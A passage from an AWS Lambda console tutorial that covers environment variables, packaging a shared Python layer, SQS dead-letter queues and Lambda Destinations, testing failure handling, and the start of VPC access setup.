Click &lt;strong&gt;Environment variables&lt;/strong&gt; → &lt;strong&gt;Edit&lt;/strong&gt; → &lt;strong&gt;Add environment variable&lt;/strong&gt;:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Key: &lt;code&gt;LOG_LEVEL&lt;/code&gt;, Value: &lt;code&gt;INFO&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;Key: &lt;code&gt;STAGE&lt;/code&gt;, Value: &lt;code&gt;dev&lt;/code&gt;
&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Click &lt;strong&gt;Save&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;✅Green banner:&lt;/strong&gt; Successfully updated the function "DataProcessor".&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;os&lt;/span&gt;

&lt;span class="c1"&gt;# Access environment variables in your code
&lt;/span&gt;&lt;span class="n"&gt;log_level&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;os&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;environ&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;get&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;LOG_LEVEL&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;INFO&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="n"&gt;stage&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;os&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;environ&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;get&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;STAGE&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;dev&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Lambda encrypts all environment variables at rest by default using an AWS managed KMS key. For extra security, you can use a customer managed KMS key and decrypt in your code.&lt;/strong&gt;&lt;/p&gt;
&lt;/blockquote&gt;




&lt;h2&gt;
  
  
  Part II
&lt;/h2&gt;

&lt;h3&gt;
  
  
  Create a Lambda Layer
&lt;/h3&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Layers let you share code and libraries across multiple functions. Let's create one with a utility module.&lt;/strong&gt;&lt;/p&gt;
&lt;/blockquote&gt;

&lt;h4&gt;
  
  
  &lt;strong&gt;Build and Upload a Layer&lt;/strong&gt;
&lt;/h4&gt;

&lt;p&gt;Layers must be uploaded as a zip file. &lt;br&gt;
We'll use &lt;strong&gt;AWS CloudShell:&lt;/strong&gt; a browser-based terminal built into the AWS Console so that you don't need anything installed locally.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Step 01:&lt;/strong&gt; Open &lt;strong&gt;CloudShell&lt;/strong&gt; by clicking the terminal icon (&lt;code&gt;&amp;gt;_&lt;/code&gt;) in the top navigation bar of the AWS Console next to the search bar&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Step 02:&lt;/strong&gt; Wait for it to initialize as it might take a few seconds the first time&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Step 03:&lt;/strong&gt;&lt;br&gt;
Run these commands:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;mkdir&lt;/span&gt; &lt;span class="nt"&gt;-p&lt;/span&gt; python
&lt;span class="nb"&gt;cat&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;&lt;/span&gt; python/utils.py &lt;span class="o"&gt;&amp;lt;&amp;lt;&lt;/span&gt; &lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="no"&gt;EOF&lt;/span&gt;&lt;span class="sh"&gt;'
"""
Shared utilities for Lambda functions.
This module is packaged as a Lambda Layer so multiple functions can use it.
"""
import json
import time
import random

def retry_with_backoff(func, max_retries=3, base_delay=0.5):
    """Retry with exponential backoff and jitter."""
    for attempt in range(max_retries + 1):
        try:
            return func()
        except Exception as e:
            if attempt == max_retries:
                raise
            delay = base_delay * (2 ** attempt)
            jitter = random.uniform(0, delay)
            time.sleep(delay + jitter)

def format_response(status_code, body):
    """Standard API Gateway response format."""
    return {
        'statusCode': status_code,
        'headers': {'Content-Type': 'application/json'},
        'body': json.dumps(body, default=str)
    }
&lt;/span&gt;&lt;span class="no"&gt;EOF

&lt;/span&gt;zip &lt;span class="nt"&gt;-r&lt;/span&gt; utils-layer.zip python/
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Step 04:&lt;/strong&gt; Download the zip&lt;br&gt;
Click &lt;strong&gt;Actions ▼&lt;/strong&gt; (top right of CloudShell) → &lt;strong&gt;Download file&lt;/strong&gt; → type &lt;code&gt;utils-layer.zip&lt;/code&gt; → click &lt;strong&gt;Download&lt;/strong&gt;&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Why the &lt;code&gt;python/&lt;/code&gt; folder?&lt;/strong&gt; Lambda layers must follow a specific directory structure. For Python, your code must be inside a &lt;code&gt;python/&lt;/code&gt; folder in the zip. Lambda adds this path to &lt;code&gt;sys.path&lt;/code&gt; automatically so your functions can &lt;code&gt;import utils&lt;/code&gt; directly.&lt;/p&gt;
&lt;/blockquote&gt;
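&lt;p&gt;If you'd rather script the packaging step (for CI, say), the same layout can be produced with Python's &lt;code&gt;zipfile&lt;/code&gt; module. This is a sketch; the &lt;code&gt;utils.py&lt;/code&gt; contents here are a placeholder for the module created above:&lt;/p&gt;

```python
import os
import zipfile

# Build the layer zip with the required python/ prefix so Lambda
# places the module on sys.path (/opt/python at runtime)
os.makedirs("python", exist_ok=True)
with open("python/utils.py", "w") as f:
    f.write("def format_response(status_code, body):\n"
            "    return {'statusCode': status_code, 'body': body}\n")

with zipfile.ZipFile("utils-layer.zip", "w", zipfile.ZIP_DEFLATED) as zf:
    zf.write("python/utils.py")

# Verify the entry sits under python/ -- a flat utils.py would not be importable
with zipfile.ZipFile("utils-layer.zip") as zf:
    print(zf.namelist())  # ['python/utils.py']
```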

&lt;p&gt;&lt;strong&gt;Step 05:&lt;/strong&gt; Upload the Layer via Console&lt;br&gt;
In the Lambda console, click &lt;strong&gt;Layers&lt;/strong&gt; in the left sidebar&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Step 06:&lt;/strong&gt; Click &lt;strong&gt;Create layer&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Name:&lt;/strong&gt; &lt;code&gt;shared-utils&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Upload:&lt;/strong&gt; Choose the &lt;code&gt;utils-layer.zip&lt;/code&gt; file&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Compatible runtimes - &lt;em&gt;optional&lt;/em&gt;:&lt;/strong&gt; Python 3.12&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Click &lt;strong&gt;Create&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;✅Green banner:&lt;/strong&gt; Successfully created layer shared-utils version 1.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Step 07:&lt;/strong&gt; &lt;strong&gt;Attach the Layer to Your Function&lt;/strong&gt;&lt;br&gt;
Go back to the &lt;code&gt;DataProcessor&lt;/code&gt; function&lt;br&gt;
Scroll down to the &lt;strong&gt;Layers&lt;/strong&gt; section&lt;br&gt;
Click &lt;strong&gt;Edit&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Step 08:&lt;/strong&gt; &lt;strong&gt;Edit layers&lt;/strong&gt;&lt;br&gt;
Click &lt;strong&gt;Add a layer&lt;/strong&gt;&lt;br&gt;
Choose &lt;strong&gt;Custom layers&lt;/strong&gt;&lt;br&gt;
Select &lt;code&gt;shared-utils&lt;/code&gt;&lt;br&gt;
&lt;strong&gt;Version:&lt;/strong&gt; &lt;code&gt;1&lt;/code&gt;&lt;br&gt;
Click &lt;strong&gt;Add&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Click &lt;strong&gt;Save&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;✅Green banner:&lt;/strong&gt; Successfully updated the function "DataProcessor".&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Step 09:&lt;/strong&gt; Now you can use it in your function code:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="kn"&gt;from&lt;/span&gt; &lt;span class="n"&gt;utils&lt;/span&gt; &lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;format_response&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;retry_with_backoff&lt;/span&gt;

&lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;lambda_handler&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;event&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;context&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="nf"&gt;format_response&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;200&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;message&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;Hello from DataProcessor&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;})&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
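&lt;p&gt;Before relying on the layer in production, it's worth exercising &lt;code&gt;retry_with_backoff&lt;/code&gt; locally against a function that fails a couple of times. The implementation below is the same code packaged into the layer; the flaky function is just a test double:&lt;/p&gt;

```python
import random
import time

def retry_with_backoff(func, max_retries=3, base_delay=0.5):
    """Retry with exponential backoff and jitter (same code as the layer)."""
    for attempt in range(max_retries + 1):
        try:
            return func()
        except Exception:
            if attempt == max_retries:
                raise
            delay = base_delay * (2 ** attempt)
            jitter = random.uniform(0, delay)
            time.sleep(delay + jitter)

calls = {"n": 0}

def flaky():
    # Fails on the first two calls, then succeeds
    calls["n"] += 1
    if calls["n"] >= 3:
        return "ok"
    raise RuntimeError("transient error")

result = retry_with_backoff(flaky, max_retries=3, base_delay=0.01)
print(result, "after", calls["n"], "attempts")  # ok after 3 attempts
```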



&lt;blockquote&gt;
&lt;p&gt;A function can have up to &lt;strong&gt;5 layers&lt;/strong&gt;. The total unzipped size of the function + all layers can't exceed &lt;strong&gt;250 MB&lt;/strong&gt;. Layers are versioned and immutable. Each upload creates a new version.&lt;/p&gt;
&lt;/blockquote&gt;
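&lt;p&gt;Those limits are easy to trip with heavy dependencies, so a quick pre-deploy check is cheap insurance. A minimal sketch (the sizes are placeholders; measure your real unzipped artifacts):&lt;/p&gt;

```python
MAX_LAYERS = 5
MAX_UNZIPPED_MB = 250  # function code + all layers, unzipped

def check_deploy(function_mb, layer_mbs):
    """Validate Lambda's layer count and combined unzipped-size limits."""
    if len(layer_mbs) > MAX_LAYERS:
        raise ValueError(f"{len(layer_mbs)} layers exceeds the limit of {MAX_LAYERS}")
    total = function_mb + sum(layer_mbs)
    if total > MAX_UNZIPPED_MB:
        raise ValueError(f"{total} MB unzipped exceeds the {MAX_UNZIPPED_MB} MB limit")
    return total

print(check_deploy(30, [120, 60]))  # 210
```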




&lt;h2&gt;
  
  
  Part III
&lt;/h2&gt;

&lt;h3&gt;
  
  
  &lt;strong&gt;Error Handling:&lt;/strong&gt; DLQ and Lambda Destinations
&lt;/h3&gt;

&lt;h4&gt;
  
  
  &lt;strong&gt;Create a Dead Letter Queue&lt;/strong&gt;
&lt;/h4&gt;

&lt;p&gt;&lt;strong&gt;Step 01:&lt;/strong&gt; Open the &lt;strong&gt;SQS&lt;/strong&gt; console&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Step 02:&lt;/strong&gt; Click &lt;strong&gt;Create queue&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Type:&lt;/strong&gt; Standard&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Name:&lt;/strong&gt; &lt;code&gt;data-processor-dlq&lt;/code&gt;
&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Click &lt;strong&gt;Create queue&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;✅Green banner:&lt;/strong&gt; Queue data-processor-dlq created successfully&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Step 03:&lt;/strong&gt; Copy the &lt;strong&gt;Queue ARN&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Step 04:&lt;/strong&gt; Create a Success Queue (for Destinations)&lt;br&gt;
Create another queue:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Name:&lt;/strong&gt; &lt;code&gt;data-processor-success&lt;/code&gt;
&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Copy the &lt;strong&gt;Queue ARN&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Step 05:&lt;/strong&gt; &lt;strong&gt;Lambda&lt;/strong&gt; → DataProcessor → Configuration → Permissions → Click the &lt;strong&gt;Role name&lt;/strong&gt;&lt;br&gt;
&lt;strong&gt;Add permissions&lt;/strong&gt; → &lt;code&gt;Attach policies&lt;/code&gt;&lt;br&gt;
Search for &lt;code&gt;AmazonSQSFullAccess&lt;/code&gt; and attach it&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Step 06:&lt;/strong&gt; Configure the DLQ on the Lambda Function&lt;br&gt;
Go back to the &lt;code&gt;DataProcessor&lt;/code&gt; function&lt;br&gt;
&lt;strong&gt;Configuration&lt;/strong&gt; tab → &lt;strong&gt;Asynchronous invocation&lt;/strong&gt; → &lt;strong&gt;Edit&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Maximum age of event:&lt;/strong&gt; &lt;code&gt;1 h 0 min 0 sec&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Retry attempts:&lt;/strong&gt; &lt;code&gt;2&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Dead-letter queue service ▼:&lt;/strong&gt; Select &lt;code&gt;Amazon SQS&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Queue ▼:&lt;/strong&gt; Select &lt;code&gt;data-processor-dlq&lt;/code&gt;
&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Click &lt;strong&gt;Save&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;✅Green banner:&lt;/strong&gt; Successfully updated the function "DataProcessor".&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Destinations are the modern approach. They capture both success AND failure.&lt;/strong&gt;&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;&lt;strong&gt;Step 07:&lt;/strong&gt; Configure Lambda Destinations&lt;br&gt;
Still in &lt;strong&gt;Asynchronous invocation&lt;/strong&gt;, find the &lt;strong&gt;Destinations&lt;/strong&gt; section&lt;br&gt;
Click &lt;strong&gt;Add destination&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Step 08:&lt;/strong&gt; Add destination&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Source:&lt;/strong&gt; &lt;code&gt;Asynchronous invocation&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Condition:&lt;/strong&gt; &lt;code&gt;On success&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Destination type:&lt;/strong&gt; &lt;code&gt;SQS queue&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Destination:&lt;/strong&gt; &lt;code&gt;data-processor-success&lt;/code&gt;
&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Click &lt;strong&gt;Save&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;✅Green banner:&lt;/strong&gt; Your changes have been saved.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Step 09:&lt;/strong&gt; Click &lt;strong&gt;Add destination&lt;/strong&gt; again&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Source:&lt;/strong&gt; &lt;code&gt;Asynchronous invocation&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Condition:&lt;/strong&gt; &lt;code&gt;On failure&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Destination type:&lt;/strong&gt; &lt;code&gt;SQS queue&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Destination:&lt;/strong&gt; &lt;code&gt;data-processor-dlq&lt;/code&gt;
&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Click &lt;strong&gt;Save&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;✅Green banner:&lt;/strong&gt; Your changes have been saved.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Lambda Destinations are preferred over DLQs because:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Destinations capture &lt;strong&gt;both&lt;/strong&gt; success and failure (a DLQ only captures failure)&lt;/li&gt;
&lt;li&gt;Destinations include more context (request payload, response, and error details)&lt;/li&gt;
&lt;li&gt;Both apply to &lt;strong&gt;asynchronous&lt;/strong&gt; invocations only&lt;/li&gt;
&lt;li&gt;For an SQS event source, configure the DLQ as a redrive policy on the source queue itself rather than on the function&lt;/li&gt;
&lt;/ul&gt;
&lt;/blockquote&gt;
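&lt;p&gt;The messages that land in the destination queues carry an invocation record. The sample below is modeled on Lambda's documented destination-event format (treat the field values as illustrative); a small parser makes monitoring the queues straightforward:&lt;/p&gt;

```python
import json

# Illustrative destination record, modeled on Lambda's invocation-record format
sample_body = json.dumps({
    "version": "1.0",
    "timestamp": "2026-05-09T07:28:09.000Z",
    "requestContext": {
        "requestId": "11111111-2222-3333-4444-555555555555",
        "functionArn": "arn:aws:lambda:us-east-1:123456789012:function:DataProcessor:$LATEST",
        "condition": "RetriesExhausted",
        "approximateInvokeCount": 3
    },
    "requestPayload": {"action": "fail"},
    "responsePayload": {"errorMessage": "Simulated failure for testing DLQ"}
})

def summarize(body):
    """Pull the fields you usually alert on out of a destination message."""
    record = json.loads(body)
    ctx = record["requestContext"]
    return {
        "condition": ctx["condition"],           # e.g. "Success" or "RetriesExhausted"
        "attempts": ctx["approximateInvokeCount"],
        "original_event": record["requestPayload"],
    }

print(summarize(sample_body))
```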
&lt;h4&gt;
  
  
  &lt;strong&gt;Test Error Handling&lt;/strong&gt;
&lt;/h4&gt;

&lt;p&gt;&lt;strong&gt;Step 10:&lt;/strong&gt; Let's create a function that sometimes fails to see the error handling in action:&lt;/p&gt;

&lt;p&gt;Deploy this code, then test it&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;json&lt;/span&gt;
&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;random&lt;/span&gt;

&lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;lambda_handler&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;event&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;context&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
    &lt;span class="sh"&gt;"""&lt;/span&gt;&lt;span class="s"&gt;
    This function randomly fails to demonstrate error handling.
    When invoked asynchronously:
    1. First attempt fails → Lambda retries
    2. Second attempt fails → Lambda retries again
    3. Third attempt fails → Event goes to DLQ / failure destination
    &lt;/span&gt;&lt;span class="sh"&gt;"""&lt;/span&gt;
    &lt;span class="n"&gt;action&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;event&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;get&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;action&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;process&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;action&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;fail&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="c1"&gt;# Always fail — will end up in DLQ after 3 attempts
&lt;/span&gt;        &lt;span class="k"&gt;raise&lt;/span&gt; &lt;span class="nc"&gt;Exception&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;Simulated failure for testing DLQ&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;action&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;random&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="c1"&gt;# 50% chance of failure
&lt;/span&gt;        &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;random&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;random&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;&lt;/span&gt; &lt;span class="mf"&gt;0.5&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
            &lt;span class="k"&gt;raise&lt;/span&gt; &lt;span class="nc"&gt;Exception&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;Random failure occurred&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;statusCode&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="mi"&gt;200&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
        &lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;body&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="n"&gt;json&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;dumps&lt;/span&gt;&lt;span class="p"&gt;({&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;message&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;Processed successfully&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;action&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="n"&gt;action&lt;/span&gt;&lt;span class="p"&gt;})&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Step 11:&lt;/strong&gt; Click &lt;strong&gt;Test&lt;/strong&gt; tab&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Step 12:&lt;/strong&gt; &lt;strong&gt;Test event&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Test event action:&lt;/strong&gt; &lt;code&gt;Create new event&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Invocation type:&lt;/strong&gt; &lt;code&gt;Synchronous&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Event name:&lt;/strong&gt; &lt;code&gt;TestFailure&lt;/code&gt; &lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Event JSON:&lt;/strong&gt;
&lt;/li&gt;
&lt;/ul&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight json"&gt;&lt;code&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"action"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"fail"&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Click &lt;strong&gt;Test&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;❌ &lt;strong&gt;Executing function:&lt;/strong&gt; failed&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;The function fails as expected. Since this was a synchronous test invocation, you see the error immediately and Lambda does not retry. To exercise the retry-then-DLQ flow, invoke the function &lt;strong&gt;asynchronously&lt;/strong&gt;: select &lt;strong&gt;Asynchronous&lt;/strong&gt; as the invocation type in the Test tab, or trigger it from S3, SNS, or EventBridge.&lt;/p&gt;
&lt;/blockquote&gt;
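&lt;p&gt;You can also reason about the async flow without deploying anything by simulating Lambda's retry loop locally. A sketch, assuming the settings configured above (2 retry attempts, so 3 total attempts before the event is handed to the DLQ / failure destination):&lt;/p&gt;

```python
def simulate_async_invoke(handler, event, retry_attempts=2):
    """Mimic Lambda's async behavior: initial attempt + retries, then DLQ."""
    dlq = []
    for attempt in range(retry_attempts + 1):
        try:
            return handler(event), dlq
        except Exception:
            pass  # Lambda would wait (1 min, then 2 min) before retrying
    dlq.append(event)  # retries exhausted: event goes to the DLQ
    return None, dlq

def always_fails(event):
    raise Exception("Simulated failure for testing DLQ")

result, dlq = simulate_async_invoke(always_fails, {"action": "fail"})
print(result, dlq)  # None [{'action': 'fail'}]
```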




&lt;h2&gt;
  
  
  Part IV
&lt;/h2&gt;

&lt;h3&gt;
  
  
  Lambda with VPC Access
&lt;/h3&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;When Lambda needs to access private resources like RDS or ElastiCache, you attach it to a VPC. Let's walk through the configuration.&lt;/strong&gt;&lt;/p&gt;
&lt;/blockquote&gt;

&lt;h4&gt;
  
  
  &lt;strong&gt;Understanding VPC Access&lt;/strong&gt;
&lt;/h4&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Without VPC:
  Lambda → Internet → AWS Services (DynamoDB, S3, SQS)  ✅
  Lambda → Private RDS                                    ❌

With VPC:
  Lambda → VPC → Private RDS                              ✅
  Lambda → VPC → Internet                                 ❌ (no NAT)
  Lambda → VPC → NAT Gateway → Internet                   ✅
  Lambda → VPC → VPC Endpoint → AWS Services              ✅
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h4&gt;
  
  
  &lt;strong&gt;Configure VPC Access (Console Walkthrough)&lt;/strong&gt;
&lt;/h4&gt;

